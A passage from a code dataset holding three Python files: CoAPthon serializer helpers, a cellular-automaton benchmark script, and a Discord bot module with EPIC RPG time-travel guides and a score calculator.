14:\n length = s.unpack_from(values[pos:])[0] + 269\n pos += 2\n else:\n raise AttributeError(\"Unsupported option length nibble \" + str(l_nibble))\n return value, length, pos\n\n @staticmethod\n def convert_to_raw(number, value, length):\n \"\"\"\n Get the value of an option as a ByteArray.\n\n :param number: the option number\n :param value: the option value\n :param length: the option length\n :return: the value of an option as a BitArray\n \"\"\"\n\n opt_type = defines.OptionRegistry.LIST[number].value_type\n\n if length == 0 and opt_type != defines.INTEGER:\n return bytearray()\n if length == 0 and opt_type == defines.INTEGER:\n return 0\n if isinstance(value, tuple):\n value = value[0]\n if isinstance(value, unicode):\n value = str(value)\n if isinstance(value, str):\n return bytearray(value, \"utf-8\")\n elif isinstance(value, int):\n return value\n else:\n return bytearray(value)\n\n @staticmethod\n def as_sorted_list(options):\n \"\"\"\n Returns all options in a list sorted according to their option numbers.\n\n :return: the sorted list\n \"\"\"\n if len(options) > 0:\n options.sort(None, key=lambda o: o.number)\n return options\n\n @staticmethod\n def get_option_nibble(optionvalue):\n \"\"\"\n Returns the 4-bit option header value.\n\n :param optionvalue: the option value (delta or length) to be encoded.\n :return: the 4-bit option header value.\n \"\"\"\n if optionvalue <= 12:\n return optionvalue\n elif optionvalue <= 255 + 13:\n return 13\n elif optionvalue <= 65535 + 269:\n return 14\n else:\n raise AttributeError(\"Unsupported option delta \" + optionvalue)\n\n @staticmethod\n def int_to_words(int_val, num_words=4, word_size=32):\n \"\"\"\n Convert a int value to bytes.\n\n :param int_val: an arbitrary length Python integer to be split up.\n Network byte order is assumed. Raises an IndexError if width of\n integer (in bits) exceeds word_size * num_words.\n\n :param num_words: number of words expected in return value tuple.\n\n :param word_size: size/width of individual words (in bits).\n\n :return: a list of fixed width words based on provided parameters.\n \"\"\"\n max_int = 2 ** (word_size*num_words) - 1\n max_word_size = 2 ** word_size - 1\n\n if not 0 <= int_val <= max_int:\n raise AttributeError('integer %r is out of bounds!' % hex(int_val))\n\n words = []\n for _ in range(num_words):\n word = int_val & max_word_size\n words.append(int(word))\n int_val >>= word_size\n words.reverse()\n\n return words\n","repo_name":"Tanganelli/CoAPthon","sub_path":"coapthon/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":14035,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"32"} +{"seq_id":"34721665176","text":"import csv\nfrom os import remove # needed to remove old CSV files\nfrom time import clock\n\nfrom constants import *\nfrom setupRun import DIRECTORY\nfrom simulationController import SimulationController\n\n# basic variable set-up\ndirectoryOut = \"%s/benchmarkCA\" % DIRECTORY # set directory for loading files\n\nfile = \"%s/sizeTest.csv\" % (directoryOut)\n\n# existing output CSV data, if possible\ntry:\n remove(file)\nexcept:\n pass\n\ntransformerName = TESTTRANSFORMER\n\ninputName = SIMPLEINPUT\ninputArgs1 = {CAINITNAMEARGS:\"initialCA1\",\n DIRECTORYARGS:None,\n THETAARGS:22.0,\n MARGS:0.21,\n RARGS:3.25,\n QARGS:1.0}\n\nruleArgs = {DISPERSIONARGS:True}\n\n# measure the timeEasyCA for one timeEasyCA step depending on the CA size with easyCA\nprint(\"start measure timeEasyCA for one step depending on CA size\")\nwith open(file, 'a', newline = '') as csvfile:\n data = csv.writer(csvfile, delimiter = \",\")\n n = 1000000\n for l in range(1, 14):\n # set initial CA\n initCA = [[[1 for h in range(2)] for i in range(l)] for j in range(n)]\n # benchmarking with easyCA\n controller1 = SimulationController(n, l, False) # disable saving\n controller1.initBenchmark(transformerName,\n inputName,\n COMBICA,\n TESTRULE,\n inputArgs1,\n initCA,\n EASYCA,\n None,\n ruleArgs)\n timeEasyCA = clock()\n controller1.doSimulation(1, 1)\n timeEasyCA = clock() - timeEasyCA\n data.writerow([n * l, timeEasyCA])\n print(\"%i: number of cells: %i; timeEasyCA: %f\" % (l, n * l, timeEasyCA))\nprint(\"measure timeEasyCA done\")","repo_name":"flossCoder/mosquito-simulation","sub_path":"run/benchmarkCASizeEasyCA.py","file_name":"benchmarkCASizeEasyCA.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19989035607","text":"# timetravel.py\n\nimport asyncio\nfrom decimal import Decimal, ROUND_HALF_UP\nfrom math import floor, ceil\nfrom typing import Optional\n\nimport discord\n\nimport database\nfrom resources import emojis, functions, settings, strings, views\n\n\n# --- Topics ---\nTOPIC_TT = 'Time travel (TT)'\nTOPIC_TJ = 'Time jump / Super time travel (STT)'\n\nTOPICS = [\n TOPIC_TT,\n TOPIC_TJ,\n]\n\nTOPIC_SCORE_GEAR = 'Gear'\nTOPIC_SCORE_MATERIALS = 'Materials'\nTOPIC_SCORE_STATS = 'Stats & enchants'\n\nTOPICS_SCORE = [\n TOPIC_SCORE_GEAR,\n TOPIC_SCORE_MATERIALS,\n TOPIC_SCORE_STATS,\n]\n\n\n# --- Calculator options ---\nINVENTORY_CURRENT = 'Calculate as is'\nINVENTORY_TRADE_A15 = 'Trade to A15 rubies'\nINVENTORY_TRADE_A16 = 'Trade to A16+ rubies'\n\nTJ_CALCULATOR_INVENTORY = [\n INVENTORY_CURRENT,\n INVENTORY_TRADE_A15,\n INVENTORY_TRADE_A16,\n]\n\nSTATS_NONE = 'No stats'\nSTATS_CURRENT = 'Current stats'\nSTATS_MANUAL = 'Manual input'\n\nTJ_CALCULATOR_STATS = [\n STATS_NONE,\n STATS_CURRENT,\n STATS_MANUAL,\n]\n\nBOOSTS_NONE = 'No boosts'\nBOOSTS_CURRENT = 'Current boosts'\n\nTJ_CALCULATOR_BOOSTS = [\n BOOSTS_NONE,\n BOOSTS_CURRENT,\n]\n\n# --- Commands ---\nasync def command_time_travel_guide(ctx: discord.ApplicationContext, topic: str) -> None:\n \"\"\"Timetravel guide command\"\"\"\n topics_functions = {\n TOPIC_TT: embed_time_travel,\n TOPIC_TJ: embed_time_jump,\n }\n view = views.TopicView(ctx, topics_functions, active_topic=topic)\n embed = await topics_functions[topic]()\n interaction = await ctx.respond(embed=embed, view=view)\n view.interaction = interaction\n await view.wait()\n try:\n await functions.edit_interaction(interaction, view=None)\n except discord.errors.NotFound:\n pass\n\n\nasync def command_time_travel_bonuses(ctx: discord.ApplicationContext, timetravel: Optional[int] = None) -> None:\n \"\"\"Timetravel guide command\"\"\"\n mytt = True if timetravel is None else False\n if timetravel is None:\n user: database.User = await database.get_user(ctx.author.id)\n timetravel = user.tt\n if timetravel == 10_000:\n await ctx.respond('https://c.tenor.com/OTU2-ychJwsAAAAC/lightning-squidward.gif')\n return\n tt: database.TimeTravel = await database.get_time_travel(timetravel)\n embed = await embed_time_travel_bonuses(tt, mytt)\n await ctx.respond(embed=embed)\n\n\nasync def command_time_jump_score(ctx: discord.ApplicationContext, topic: str) -> None:\n \"\"\"Time jump score command\"\"\"\n topics_functions = {\n TOPIC_SCORE_GEAR: embed_time_jump_score_gear,\n TOPIC_SCORE_MATERIALS: embed_time_jump_score_materials,\n TOPIC_SCORE_STATS: embed_time_jump_score_stats,\n }\n view = views.TopicView(ctx, topics_functions, active_topic=topic)\n embed = await topics_functions[topic]()\n interaction = await ctx.respond(embed=embed, view=view)\n view.interaction = interaction\n await view.wait()\n try:\n await functions.edit_interaction(interaction, view=None)\n except discord.errors.NotFound:\n pass\n\n\nasync def command_time_jump_calculator(bot: discord.Bot, ctx: discord.ApplicationContext, area_no: int,\n option_inventory: str, option_stats: str, option_boosts: str) -> None:\n \"\"\"STT score calculator command\"\"\"\n bot_message_task = asyncio.ensure_future(functions.wait_for_inventory_message(bot, ctx))\n try:\n content = strings.MSG_WAIT_FOR_INPUT_SLASH.format(user=ctx.author.name,\n command=strings.SLASH_COMMANDS_EPIC_RPG[\"inventory\"])\n bot_message = await functions.wait_for_bot_or_abort(ctx, bot_message_task, content)\n except asyncio.TimeoutError:\n await ctx.respond(\n strings.MSG_BOT_MESSAGE_NOT_FOUND.format(user=ctx.author.name, information='inventory'),\n ephemeral=True\n )\n return\n if bot_message is None: return\n inventory = ''\n for field in bot_message.embeds[0].fields:\n inventory = f'{inventory}{field.value}\\n'\n\n profile_data = {}\n boosts_data = {\n 'at': 0,\n 'def': 0,\n 'life': 0,\n }\n if option_stats == STATS_CURRENT:\n bot_message_task = asyncio.ensure_future(functions.wait_for_profile_message(bot, ctx))\n try:\n content = strings.MSG_WAIT_FOR_INPUT_SLASH.format(user=ctx.author.name,\n command=strings.SLASH_COMMANDS_EPIC_RPG[\"profile\"])\n bot_message_profile = await functions.wait_for_bot_or_abort(ctx, bot_message_task, content)\n except asyncio.TimeoutError:\n await ctx.respond(\n strings.MSG_BOT_MESSAGE_NOT_FOUND.format(user=ctx.author.name, information='profile'),\n ephemeral=True\n )\n return\n if bot_message is None: return\n profile_data = await functions.extract_data_from_profile_embed(ctx, bot_message_profile)\n if option_boosts == BOOSTS_CURRENT:\n bot_message_task = asyncio.ensure_future(functions.wait_for_boosts_message(bot, ctx))\n try:\n content = strings.MSG_WAIT_FOR_INPUT_SLASH.format(user=ctx.author.name,\n command=strings.SLASH_COMMANDS_EPIC_RPG[\"boosts\"])\n bot_message_boosts = await functions.wait_for_bot_or_abort(ctx, bot_message_task, content)\n except asyncio.TimeoutError:\n await ctx.respond(\n strings.MSG_BOT_MESSAGE_NOT_FOUND.format(user=ctx.author.name, information='boosts'),\n ephemeral=True\n )\n return\n if bot_message is None: return\n boosts_data = await functions.extract_data_from_boosts_embed(ctx, bot_message_boosts)\n profile_data['horse_boost'] = 0\n profile_data['horse_epicness'] = 0\n profile_data['horse_level'] = 0\n profile_data['horse_tier'] = 0\n if profile_data['horse_type'] in ('magic', 'defender', 'strong', 'tank'):\n bot_message_task = asyncio.ensure_future(functions.wait_for_horse_message(bot, ctx))\n try:\n content = strings.MSG_WAIT_FOR_INPUT_SLASH.format(user=ctx.author.name,\n command=strings.SLASH_COMMANDS_EPIC_RPG[\"horse stats\"])\n bot_message = await functions.wait_for_bot_or_abort(ctx, bot_message_task, content)\n except asyncio.TimeoutError:\n await ctx.respond(\n strings.MSG_BOT_MESSAGE_NOT_FOUND.format(user=ctx.author.name, information='horse stats'),\n ephemeral=True\n )\n return\n if bot_message is None: return\n horse_data = await functions.extract_horse_data_from_horse_embed(ctx, bot_message)\n profile_data['horse_boost'] = horse_data['boost']\n profile_data['horse_epicness'] = horse_data['epicness']\n profile_data['horse_level'] = horse_data['level']\n profile_data['horse_tier'] = horse_data['tier']\n\n if option_stats == STATS_MANUAL:\n all_items_list = list(await database.get_all_items())\n all_items_list.sort(key=lambda item: item.score)\n profile_data['sword'] = None\n profile_data['armor'] = None\n all_items = {}\n for item in all_items_list:\n if item.name.lower() == 'ultra-omega sword':\n profile_data['sword'] = item\n if item.name.lower() == 'ultra-omega armor':\n profile_data['armor'] = item\n all_items[item.name] = item\n profile_data['level'] = 200\n profile_data['extra_at'] = 0\n profile_data['extra_def'] = 0\n profile_data['extra_life'] = 0\n profile_data['enchant_sword'] = 'OMEGA'\n profile_data['enchant_armor'] = 'OMEGA'\n\n embed = await embed_time_jump_calculator(area_no, inventory.lower(), profile_data, boosts_data, option_inventory,\n option_stats)\n if option_stats == STATS_MANUAL:\n view = views.TimeJumpCalculatorView(ctx, area_no, inventory.lower(), profile_data, boosts_data, option_inventory,\n option_stats, all_items, embed_time_jump_calculator)\n interaction = await ctx.respond(embed=embed, view=view)\n view.interaction = interaction\n await view.wait()\n else:\n await ctx.respond(embed=embed)\n\n\n# --- Embeds ---\nasync def embed_time_travel() -> discord.Embed:\n \"\"\"Time travel overview\"\"\"\n where = (\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 0: Beat dungeon 10, reach area 11\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 1-2: Beat dungeon 11, reach area 12\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 3-4: Beat dungeon 12, reach area 13\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 5-9: Beat dungeon 13, reach area 14\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 10-24: Beat dungeon 14, reach area 15\\n'\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 25+: Beat dungeon 15-1\\n'\n )\n keptitems = (\n f'{emojis.BP} Active boosts\\n'\n f'{emojis.BP} Arena cookies\\n'\n f'{emojis.BP} Coins (this includes your bank account)\\n'\n f'{emojis.BP} Dragon essences\\n'\n f'{emojis.BP} EPIC berries\\n'\n f'{emojis.BP} EPIC coins\\n'\n f'{emojis.BP} EPIC shop items\\n'\n f'{emojis.BP} Event items (if an event is active)\\n'\n f'{emojis.BP} GODLY horse tokens\\n'\n f'{emojis.BP} Guild rings\\n'\n f'{emojis.BP} Legendary toothbrushes\\n'\n f'{emojis.BP} Magic chairs\\n'\n f'{emojis.BP} Profession levels\\n'\n f'{emojis.BP} OMEGA horse tokens\\n'\n f'{emojis.BP} Party poppers\\n'\n f'{emojis.BP} TIME capsules\\n'\n f'{emojis.BP} TIME cookies\\n'\n f'{emojis.BP} TIME dragon essences\\n'\n f'{emojis.BP} Your guild\\n'\n f'{emojis.BP} Your horse\\n'\n f'{emojis.BP} Your marriage partner\\n'\n f'{emojis.BP} Your pets\\n'\n )\n boosts = (\n f'{emojis.BP} {emojis.POTION_TIME} TIME potion: Keep `7.5`% of the items in your inventory\\n'\n )\n embed = discord.Embed(\n color = settings.EMBED_COLOR,\n title = 'TIME TRAVEL (TT)',\n description = (\n f'Resets your character to level 1 / area 1 but unlocks new game features and increases XP and drop chances.\\n'\n f'To time travel, use {strings.SLASH_COMMANDS_EPIC_RPG[\"time travel\"]} while meeting the requirements.\\n'\n f'Warning: **You will lose everything except the items mentioned below**. So make sure you have done all '\n f'you want to do. You can check what you should do before time traveling by looking up the TT you are '\n f'going to travel to with {strings.SLASH_COMMANDS_GUIDE[\"time travel bonuses\"]}.'\n )\n\n )\n embed.add_field(name='REQUIREMENTS FOR TIME TRAVEL', value=where, inline=False)\n embed.add_field(name='WHAT YOU KEEP', value=keptitems, inline=False)\n embed.add_field(name='POTIONS THAT AFFECT TIME TRAVEL', value=boosts, inline=False)\n return embed\n\n\nasync def embed_time_travel_bonuses(tt: database.TimeTravel, mytt: bool = False):\n \"\"\"Embed with details for specific time travel\"\"\"\n bonus_xp = (99 + tt.tt) * tt.tt / 2\n bonus_duel_xp = (99 + tt.tt) * tt.tt / 4\n bonus_drop_chance = (49 + tt.tt) * tt.tt / 2\n berry_drop_chance = bonus_drop_chance / 10\n #artifacts_drop_chance = bonus_drop_chance / 4\n dynamite_rubies = 1 + (bonus_drop_chance / 100)\n crops_normal_min = dynamite_rubies * 2\n crops_normal_max = dynamite_rubies * 3\n crops_special_min = dynamite_rubies * 5\n crops_special_med = dynamite_rubies * 6\n crops_special_max = dynamite_rubies * 7\n greenhouse_watermelon_min = dynamite_rubies * 2\n greenhouse_watermelon_max = dynamite_rubies * 3\n chainsaw_mega = dynamite_rubies * 2\n bigboat_superfish = ceil(0.85 * dynamite_rubies)\n chainsaw_ultimate = dynamite_rubies / 3.5\n dynamite_rubies = Decimal(dynamite_rubies).quantize(Decimal('1'), rounding=ROUND_HALF_UP)\n #greenhouse_watermelon_min = Decimal(greenhouse_watermelon_min).quantize(Decimal('1'), rounding=ROUND_HALF_UP)\n #greenhouse_watermelon_max = Decimal(greenhouse_watermelon_max).quantize(Decimal('1'), rounding=ROUND_HALF_UP)\n chainsaw_ultimate = Decimal(chainsaw_ultimate).quantize(Decimal('1'), rounding=ROUND_HALF_UP)\n rubies = int(dynamite_rubies)\n crops_normal_min = int(crops_normal_min)\n crops_normal_max = int(crops_normal_max)\n crops_special_min = int(crops_special_min)\n crops_special_med = int(crops_special_med)\n crops_special_max = int(crops_special_max)\n watermelon_min = int(greenhouse_watermelon_min)\n watermelon_max = int(greenhouse_watermelon_max)\n super_fish = int(bigboat_superfish)\n mega_log = int(chainsaw_mega)\n ultimate_logs = int(chainsaw_ultimate)\n if ultimate_logs <= 0: ultimate_logs = 1\n if super_fish <= 0: super_fish = 1\n # Enchant multiplier formula is from a player, tested up to TT120 + 194 + 200. TT15 only one found to be wrong so far.\n tt_enchant_multipliers = {\n 15: 6,\n }\n if tt.tt in tt_enchant_multipliers:\n enchant_multiplier = tt_enchant_multipliers[tt.tt]\n else:\n enchant_multiplier = round((tt.tt ** 2 / 64) + (7 * tt.tt / 73) + (19 / 35))\n bonus_xp = f'{bonus_xp:,.1f}'.replace('.0','')\n bonus_duel_xp = f'{bonus_duel_xp:,.1f}'.replace('.0','')\n bonus_drop_chance = f'{bonus_drop_chance:,.1f}'.replace('.0','')\n berry_drop_chance = f'{berry_drop_chance:,.1f}'.replace('.0','')\n #artifacts_drop_chance = f'{artifacts_drop_chance:,g}'\n if mytt:\n embed_description = (\n f'This is your current TT according to your settings.\\n'\n f'If this is wrong, use {strings.SLASH_COMMANDS_GUIDE[\"set progress\"]} to change it.'\n )\n else:\n embed_description = 'Allons-y !'\n unlocks = ''\n if tt.unlock_misc is not None:\n unlocks = f'{emojis.BP} Unlocks **{tt.unlock_misc}**\\n'\n if tt.unlock_dungeon is not None:\n unlocks = f'{unlocks}{emojis.BP} Unlocks **dungeon {tt.unlock_dungeon}**\\n'\n if tt.unlock_area is not None:\n unlocks = f'{unlocks}{emojis.BP} Unlocks **area {tt.unlock_area}**\\n'\n if tt.unlock_enchant is not None:\n unlocks = f'{unlocks}{emojis.BP} Unlocks the **{tt.unlock_enchant}** enchant\\n'\n if tt.unlock_title is not None:\n unlocks = f'{unlocks}{emojis.BP} Unlocks the title **{tt.unlock_title}**\\n'\n unlocks = (\n f\"{unlocks}{emojis.BP} `{bonus_xp}` % increased **XP** from everything except duels\\n\"\n f'{emojis.BP} `{bonus_duel_xp}` % increased **XP** from **duels**\\n'\n f'{emojis.BP} `{bonus_drop_chance}` % extra chance to get **monster drops**\\n'\n f'{emojis.BP} `{bonus_drop_chance}` % more **items** with work commands\\n'\n f'{emojis.BP} `{berry_drop_chance}` % more **EPIC berries** with pickup commands\\n'\n #f'{emojis.BP} `{artifacts_drop_chance}` % extra chance to find **artifact parts**\\n'\n f'{emojis.BP} `x{enchant_multiplier:,}` enchanting multiplier (_approximation formula_)\\n'\n )\n if tt.tt > 1:\n unlocks = (\n f'{unlocks.strip()}\\n'\n f'{emojis.BP} `{tt.tt + 5:,}` base pet slots\\n'\n f'{emojis.DETAIL} Your total pet slots depend on the coolness pet slot multiplier\\n'\n f'{emojis.DETAIL} See {strings.SLASH_COMMANDS_EPIC_RPG[\"ultraining progress\"]} to see your multiplier\\n'\n )\n if tt.tt > 0:\n unlocks = (\n f'{unlocks.strip()}\\n'\n f'{emojis.BP} Higher chance to get `+1` tier in {strings.SLASH_COMMANDS_EPIC_RPG[\"horse breeding\"]} and '\n f'{strings.SLASH_COMMANDS_EPIC_RPG[\"pets fusion\"]} (chance unknown)\\n'\n )\n coin_cap = f'`{pow(tt.tt, 4) * 500_000_000:,}`' if tt.tt > 0 else '`100,000` - `14,400,000`'\n field_coin_cap = (\n f'{emojis.BP} ~{coin_cap} {emojis.COIN} coins\\n'\n f'{emojis.BP} Use {strings.SLASH_COMMANDS_GUIDE[\"coin cap calculator\"]} to see your exact cap\\n'\n )\n work_multiplier = (\n f'{emojis.BP} `{crops_special_min:,}`, `{crops_special_med:,}` or `{crops_special_max:,}` {emojis.BREAD}'\n f'{emojis.CARROT}{emojis.POTATO} with {strings.SLASH_COMMANDS_EPIC_RPG[\"farm\"]} from special seeds\\n'\n f'{emojis.BP} `{crops_normal_min:,}` or `{crops_normal_max:,}` {emojis.BREAD}'\n f'{emojis.CARROT}{emojis.POTATO} with {strings.SLASH_COMMANDS_EPIC_RPG[\"farm\"]} from normal seeds\\n'\n f'{emojis.BP} ~`{watermelon_min:,}` - `{watermelon_max:,}` {emojis.WATERMELON} with '\n f'{strings.SLASH_COMMANDS_EPIC_RPG[\"greenhouse\"]}\\n'\n f'{emojis.BP} `{mega_log:,}` {emojis.LOG_MEGA} with {strings.SLASH_COMMANDS_EPIC_RPG[\"chainsaw\"]}\\n'\n f'{emojis.BP} `{rubies:,}` {emojis.RUBY} with {strings.SLASH_COMMANDS_EPIC_RPG[\"dynamite\"]}\\n'\n f'{emojis.BP} `{rubies:,}` {emojis.LOG_HYPER} / {emojis.LOG_ULTRA} with {strings.SLASH_COMMANDS_EPIC_RPG[\"chainsaw\"]}\\n'\n f'{emojis.BP} ~`{super_fish:,}` {emojis.FISH_SUPER} with {strings.SLASH_COMMANDS_EPIC_RPG[\"bigboat\"]}\\n'\n f'{emojis.BP} ~`{ultimate_logs:,}` {emojis.LOG_ULTIMATE} with {strings.SLASH_COMMANDS_EPIC_RPG[\"chainsaw\"]}\\n'\n )\n prep_tt1_to_2 = (\n f'{emojis.BP} If your horse is T6+: Get 30m coins\\n'\n f'{emojis.BP} If your horse is discord.Embed:\n \"\"\"Super timetravel guide\"\"\"\n requirements = (\n f'{emojis.BP} {emojis.TIME_TRAVEL} TT 25+\\n'\n f'{emojis.BP} {emojis.TIME_KEY} TIME key (drops from the boss in dungeon 15-1)'\n )\n starter_bonuses = (\n f'{emojis.BP} Start with +25 LIFE (50 score)\\n'\n f'{emojis.BP} Start with a new Tier I pet (300 score)\\n'\n f'{emojis.BP} Start with +50 AT (400 score)\\n'\n f'{emojis.BP} Start with +50 DEF (400 score)\\n'\n f'{emojis.BP} Start with 35 of each monster drop (400 score)\\n'\n f'{emojis.BP} Start with an OMEGA lootbox (500 score)\\n'\n f'{emojis.BP} Start with a new Tier III pet (1,500 score)\\n'\n f'{emojis.BP} Start with 10 ULTRA logs (1,750 score)\\n'\n f'{emojis.BP} Start in area 2 (2,000 score)\\n'\n f'{emojis.BP} Start with a new Tier I pet with 1 skill (4,500 score)\\n'\n f'{emojis.BP} Start in area 3 (4,500 score)\\n'\n f'{emojis.BP} Start with a GODLY lootbox (6,500 score)'\n )\n embed = discord.Embed(\n color = settings.EMBED_COLOR,\n title = 'TIME JUMP / SUPER TIME TRAVEL (STT)',\n description = (\n f'Time jumping is unlocked once you reach {emojis.TIME_TRAVEL} TT 25. From this point onward you have '\n f'to use {strings.SLASH_COMMANDS_EPIC_RPG[\"time jump\"]} to reach the next TT.\\n'\n f'Time jump lets you choose a starter bonus. You can (and have to) choose **1** bonus.\\n'\n f'These bonuses cost score points which are calculated based on your inventory and your gear '\n f'(see {strings.SLASH_COMMANDS_GUIDE[\"time jump score\"]}).\\n'\n )\n\n )\n embed.add_field(name='REQUIREMENTS', value=requirements, inline=False)\n embed.add_field(name='STARTER BONUSES', value=starter_bonuses, inline=False)\n return embed\n\n\nasync def embed_time_jump_score_stats() -> discord.Embed:\n \"\"\"STT score stats & enchants embed\"\"\"\n base = (\n f'{emojis.BP} You have a base score of 8, regardless of anything else'\n )\n level = (\n f'{emojis.BP} 1 level without stats = 0.5 score\\n'\n f'{emojis.BP} 1 level including its stats = 0.9 score\\n'\n )\n stats = (\n f'{emojis.BP} 1 {emojis.STAT_AT} AT = 0.125 score\\n'\n f'{emojis.BP} 1 {emojis.STAT_DEF} DEF = 0.15 score\\n'\n f'{emojis.BP} 1 {emojis.STAT_LIFE} HP = 0.025 score\\n'\n f'{emojis.DETAIL} Only **base** stats give score!\\n'\n f'{emojis.DETAIL} This includes stats from level, food, boosts and gear\\n'\n )\n enchants = (\n f'{emojis.BP} Enchants have a score that is 4x their bonus / 100\\n'\n f'{emojis.DETAIL} Example: OMEGA enchant is `125 * 4 / 100` = 5 score\\n'\n )\n calculation = (\n f'{emojis.BP} Add stats and level scores and ceil\\n'\n f'{emojis.BP} Add both enchant scores and ceil\\n'\n )\n calculator = (\n f'{emojis.BP} Use {strings.SLASH_COMMANDS_GUIDE[\"time jump calculator\"]} to calculate your score'\n )\n embed = discord.Embed(\n color = settings.EMBED_COLOR,\n title = 'TIME JUMP SCORE • STATS & ENCHANTS',\n )\n embed.add_field(name='BASE SCORE', value=base, inline=False)\n embed.add_field(name='LEVEL', value=level, inline=False)\n embed.add_field(name='STATS', value=stats, inline=False)\n embed.add_field(name='ENCHANTS', value=enchants, inline=False)\n embed.add_field(name='HOW TO CALCULATE', value=calculation, inline=False)\n embed.add_field(name='CALCULATOR', value=calculator, inline=False)\n return embed\n\n\nasync def embed_time_jump_score_materials() -> discord.Embed:\n \"\"\"STT score materials embed\"\"\"\n lootboxes = (\n f'{emojis.BP} 1 {emojis.LB_COMMON} common lootbox = 0.05 score\\n'\n f'{emojis.BP} 1 {emojis.LB_UNCOMMON} uncommon lootbox = 0.1 score\\n'\n f'{emojis.BP} 1 {emojis.LB_RARE} rare lootbox = 0.133... score\\n'\n f'{emojis.BP} 1 {emojis.LB_EPIC} EPIC lootbox = 0.2 score\\n'\n f'{emojis.BP} 1 {emojis.LB_EDGY} EDGY lootbox = 0.25 score\\n'\n f'{emojis.BP} 1 {emojis.LB_OMEGA} OMEGA lootbox = 5 score\\n'\n f'{emojis.BP} 1 {emojis.LB_GODLY} GODLY lootbox = 50 score\\n'\n f'{emojis.BP} 1 {emojis.LB_VOID} VOID lootbox = 200 score\\n'\n )\n farm_items = (\n f'{emojis.BP} 35 {emojis.POTATO} potatoes = 1 score\\n'\n f'{emojis.BP} 30 {emojis.CARROT} carrots = 1 score\\n'\n f'{emojis.BP} 25 {emojis.BREAD} bread = 1 score (best value)\\n'\n f'{emojis.BP} 1 {emojis.SEED_POTATO} potato seed = 1 score\\n'\n f'{emojis.BP} 1 {emojis.SEED_CARROT} carrot seed = 1 score\\n'\n f'{emojis.BP} 1 {emojis.SEED_BREAD} bread seed = 1 score\\n'\n f'{emojis.BP} 2,500 {emojis.SEED} seed = 1 score (10k seeds max)\\n'\n )\n mob_drops = (\n f'{emojis.BP} 20 {emojis.WOLF_SKIN} wolf skins = 1 score\\n'\n f'{emojis.BP} 20 {emojis.ZOMBIE_EYE} zombie eyes = 2 score\\n'\n f'{emojis.BP} 20 {emojis.UNICORN_HORN} unicorn horns = 3 score\\n'\n f'{emojis.BP} 20 {emojis.MERMAID_HAIR} mermaid hairs = 4 score\\n'\n f'{emojis.BP} 20 {emojis.CHIP} chips = 5 score\\n'\n f'{emojis.BP} 20 {emojis.DRAGON_SCALE} dragon scales = 10 score\\n'\n f'{emojis.BP} 20 {emojis.DARK_ENERGY} dark energy = 15 score\\n'\n )\n rubies = (\n f'{emojis.BP} 25 {emojis.RUBY} rubies = 1 score\\n'\n )\n logs = (\n f'{emojis.BP} 25,000 {emojis.LOG} wooden logs = 1 score\\n'\n f'{emojis.BP} 2,500 {emojis.LOG_EPIC} EPIC logs = 1 score\\n'\n f'{emojis.BP} 250 {emojis.LOG_SUPER} SUPER logs = 1 score\\n'\n f'{emojis.BP} 25 {emojis.LOG_MEGA} MEGA logs = 1 score\\n'\n f'{emojis.BP} 2.5 {emojis.LOG_HYPER} HYPER log = 1 score\\n'\n f'{emojis.BP} 1 {emojis.LOG_ULTRA} ULTRA log = 4 score\\n'\n f'{emojis.BP} 1 {emojis.LOG_ULTIMATE} ULTIMATE log = 40 score\\n'\n )\n fish = (\n f'{emojis.BP} 25,000 {emojis.FISH} normie fish = 1 score\\n'\n f'{emojis.BP} 1,250 {emojis.FISH_GOLDEN} golden fish = 1 score\\n'\n f'{emojis.BP} 12.5 {emojis.FISH_EPIC} EPIC fish = 1 score\\n'\n f'{emojis.BP} 1 {emojis.FISH_SUPER} SUPER fish = 8 score\\n'\n )\n fruit = (\n f'{emojis.BP} 5,000 {emojis.APPLE} apples = 1 score\\n'\n f'{emojis.BP} 250 {emojis.BANANA} bananas = 1 score\\n'\n f'{emojis.BP} 12 {emojis.WATERMELON} watermelons = 1 score\\n'\n )\n other = (\n f'{emojis.BP} 500,000 {emojis.LIFE_POTION} life potions = 1 score (1m potions max)\\n'\n f'{emojis.BP} 2 {emojis.LOTTERY_TICKET} lottery tickets = 1 score (200 tickets max)\\n'\n )\n calculation = (\n f'{emojis.BP} Add lootbox and farm item scores and floor\\n'\n f'{emojis.BP} Add mob drop scores and floor\\n'\n f'{emojis.BP} Ceil life potion score\\n'\n f'{emojis.BP} Ceil lottery ticket score\\n'\n f'{emojis.BP} Add all other material scores and floor\\n'\n )\n calculator = (\n f'{emojis.BP} Use {strings.SLASH_COMMANDS_GUIDE[\"time jump calculator\"]} to calculate your score'\n )\n embed = discord.Embed(\n color = settings.EMBED_COLOR,\n title = 'TIME JUMP SCORE • MATERIALS',\n )\n embed.add_field(name='LOOTBOXES', value=lootboxes, inline=False)\n embed.add_field(name='FARM ITEMS', value=farm_items, inline=False)\n embed.add_field(name='MOB DROPS', value=mob_drops, inline=False)\n embed.add_field(name='RUBIES', value=rubies, inline=False)\n embed.add_field(name='LOGS', value=logs, inline=False)\n embed.add_field(name='FISH', value=fish, inline=False)\n embed.add_field(name='FRUIT', value=fruit, inline=False)\n embed.add_field(name='OTHER MATERIALS', value=other, inline=False)\n embed.add_field(name='HOW TO CALCULATE', value=calculation, inline=False)\n embed.add_field(name='CALCULATOR', value=calculator, inline=False)\n return embed\n\n\nasync def embed_time_jump_score_gear() -> discord.Embed:\n \"\"\"STT score gear embed\"\"\"\n gear_basic = (\n f'{emojis.BP} {emojis.SWORD_BASIC} Basic Sword = 0.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_BASIC} Basic Armor = 0.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_WOODEN} Wooden Sword = 1 score\\n'\n f'{emojis.BP} {emojis.ARMOR_FISH} Fish Armor = 1 score\\n'\n f'{emojis.BP} {emojis.SWORD_FISH} Fish Sword = 1.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_WOLF} Wolf Armor = 1.5 score\\n'\n f'{emojis.BP} 